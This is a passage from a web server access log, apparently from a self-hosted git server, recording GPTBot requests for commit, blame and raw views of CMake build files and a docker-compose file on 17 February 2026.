+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13528] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16923] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11278] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11262] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13300] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16051] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10072] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16405] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16403] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 